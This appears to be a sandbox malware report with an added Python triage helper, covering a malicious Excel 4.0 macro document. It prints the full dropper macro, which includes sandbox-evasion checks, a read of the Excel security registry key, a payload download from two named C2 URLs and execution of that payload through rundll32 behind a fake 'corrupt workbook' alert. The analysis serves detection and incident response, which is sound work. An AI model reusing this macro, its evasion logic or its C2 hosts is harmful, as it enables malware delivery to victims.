General

  • Target

  • Size

    192KB

  • MD5

    bf1efbdca05fab7682b9da5b800c2d4c

  • SHA1

    e57949811523eed8ab9321394a537bb909eaa7e7

  • SHA256

    5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19

  • SHA512

    4ba1b206c2085926972d87d044b770394443b129e707c8f396725597b36a9cb4f7be5de7a9026d579331d6af5a3365d74e3cfe1148420010a2625c7681ed8b07

Score
10/10
xlm

Malware Config

Extracted

Rule Excel 4.0 XLM Macro
C2

https://gameaze.com/wp-content/themes/wp_data.php

https://friendoffishing.com/wp-content/themes/calliope/template-parts/wp_data.php

Attributes
formulas
=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
=IF(GET.WORKSPACE(19),,CLOSE(TRUE))
=IF(GET.WORKSPACE(42),,CLOSE(TRUE))
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
="C:\Users\"&GET.WORKSPACE(26)&"\AppData\Local\Temp\"&RANDBETWEEN(1,9999)&".reg"
="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&R[-1]C&" /y"
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R[-1]C,0,5)
=WAIT(NOW()+"00:00:03")
=FOPEN(R[-4]C)
=FPOS(R[-1]C,215)
=FREAD(R[-2]C,255)
=FCLOSE(R[-3]C)
=FILE.DELETE(R[-8]C)
=IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
="C:\Users\"&GET.WORKSPACE(26)&"\AppData\Local\Temp\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr"
="https://gameaze.com/wp-content/themes/wp_data.php"
="https://friendoffishing.com/wp-content/themes/calliope/template-parts/wp_data.php"
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-3]C,0,0)
=IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-4]C,0,0),)
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe",R[-6]C&",DllRegisterServer",0,5)
=CLOSE(FALSE)
=GOTO(Y1)
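
The formulas above read as a single linear macro: five GET.WORKSPACE() checks close the workbook on a small screen, no mouse, no sound or a non-Windows host; reg.exe exports the HKCU Excel Security key to a random %TEMP%\<n>.reg, a 255-byte window of it is read back and the macro closes if it contains "0001" (VBAWarnings=1, all macros enabled, is the setting analysis sandboxes commonly use); the payload is fetched to %TEMP%\CVR<n>.tmp.cvr from the first C2, or from the second if the first download returns an error, a fake "corrupt workbook" alert is shown and the file is run via rundll32 with the DllRegisterServer export. The helper below is an added triage example, not part of the sandbox report or of any vendor tool: it takes the formulas as listed, assumes they sit in consecutive rows of one column in that order (the only layout under which the R[-n]C references line up, which they do), resolves those references so each CALL() can be read with literal arguments, lists the URLs and Win32 exports used, and explains the GET.WORKSPACE() indices from the Excel 4.0 macro reference.

```python
"""Triage helper for the Excel 4.0 (XLM) formulas extracted in the report.

Added example, not part of the report or any vendor tool. Assumption: the
formulas occupy consecutive rows 1..N of a single column, in report order,
so that R[-n]C means "the cell n rows above in the same column".
"""
import re

# Formulas copied from the report, one list entry per cell (rows 1..24).
FORMULAS = [
    r'=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)',
    r'=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)',
    r'=IF(GET.WORKSPACE(19),,CLOSE(TRUE))',
    r'=IF(GET.WORKSPACE(42),,CLOSE(TRUE))',
    r'=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))',
    r'="C:\Users\"&GET.WORKSPACE(26)&"\AppData\Local\Temp\"&RANDBETWEEN(1,9999)&".reg"',
    r'="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&R[-1]C&" /y"',
    r'=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R[-1]C,0,5)',
    r'=WAIT(NOW()+"00:00:03")',
    r'=FOPEN(R[-4]C)',
    r'=FPOS(R[-1]C,215)',
    r'=FREAD(R[-2]C,255)',
    r'=FCLOSE(R[-3]C)',
    r'=FILE.DELETE(R[-8]C)',
    r'=IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)',
    r'="C:\Users\"&GET.WORKSPACE(26)&"\AppData\Local\Temp\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr"',
    r'="https://gameaze.com/wp-content/themes/wp_data.php"',
    r'="https://friendoffishing.com/wp-content/themes/calliope/template-parts/wp_data.php"',
    r'=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-3]C,0,0)',
    r'=IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-4]C,0,0),)',
    '=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it\'s corrupt.",2)',
    r'=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe",R[-6]C&",DllRegisterServer",0,5)',
    r'=CLOSE(FALSE)',
    r'=GOTO(Y1)',
]

REL_REF = re.compile(r"R\[(-?\d+)\]C")               # same-column relative reference
URL_RE = re.compile(r'"(https?://[^"]+)"')
CALL_RE = re.compile(r'CALL\("([^"]+)","([^"]+)"')  # CALL("dll","export",...)
WORKSPACE_RE = re.compile(r"GET\.WORKSPACE\((\d+)\)")

# Meaning of the GET.WORKSPACE() indices this macro queries (Excel 4.0 macro reference).
WORKSPACE_INFO = {
    1: "environment name and version (checked for 'Windows')",
    2: "Excel version (used to build the Office registry path)",
    13: "usable workspace width in points (small => likely sandbox)",
    14: "usable workspace height in points (small => likely sandbox)",
    19: "mouse present",
    26: "user name (used to build the %TEMP% paths)",
    42: "computer can play sounds",
}


def resolve_refs(formulas, row, _seen=frozenset()):
    """Return the formula in 1-based `row` with each R[k]C replaced by the
    recursively resolved text of the cell it points to, in parentheses, so a
    CALL() can be read with literal arguments instead of cell hops."""
    if row in _seen or not 1 <= row <= len(formulas):
        return f"<row {row}>"  # reference cycle or outside the extracted cells
    seen = _seen | {row}

    def expand(match):
        target = row + int(match.group(1))
        return "(" + resolve_refs(formulas, target, seen).lstrip("=") + ")"

    return REL_REF.sub(expand, formulas[row - 1])


def extract_urls(formulas):
    """Every quoted http(s) literal, in order of appearance."""
    return [u for f in formulas for u in URL_RE.findall(f)]


def extract_api_calls(formulas):
    """(row, dll, export, resolved formula) for each CALL() into a Win32 DLL."""
    return [(row, dll, func, resolve_refs(formulas, row))
            for row, f in enumerate(formulas, start=1)
            for dll, func in CALL_RE.findall(f)]


def workspace_checks(formulas):
    """GET.WORKSPACE() indices the macro queries, mapped to what they reveal."""
    return {int(i): WORKSPACE_INFO.get(int(i), "index not in table")
            for f in formulas for i in WORKSPACE_RE.findall(f)}


def triage(formulas):
    """Summary of network, execution and evasion indicators for a ticket."""
    calls = extract_api_calls(formulas)
    return {
        "urls": extract_urls(formulas),
        "download_calls": [c for c in calls if c[2] == "URLDownloadToFileA"],
        "exec_calls": [c for c in calls if c[2] == "ShellExecuteA"],
        "workspace_checks": workspace_checks(formulas),
    }


if __name__ == "__main__":
    summary = triage(FORMULAS)
    print("URLs:", *summary["urls"], sep="\n  ")
    for row, dll, func, resolved in summary["download_calls"] + summary["exec_calls"]:
        print(f"row {row}: {dll}!{func}\n  {resolved}")
    for idx, meaning in sorted(summary["workspace_checks"].items()):
        print(f"GET.WORKSPACE({idx}): {meaning}")
```

Resolving the references is what turns row 22 into a readable command: the rundll32 argument is the same CVR<n>.tmp.cvr path that row 19 and the fallback in row 20 write to, which is the artifact to hunt for on a host that opened this file.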

Signatures

Files

  • 5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19
    .xls windows office2003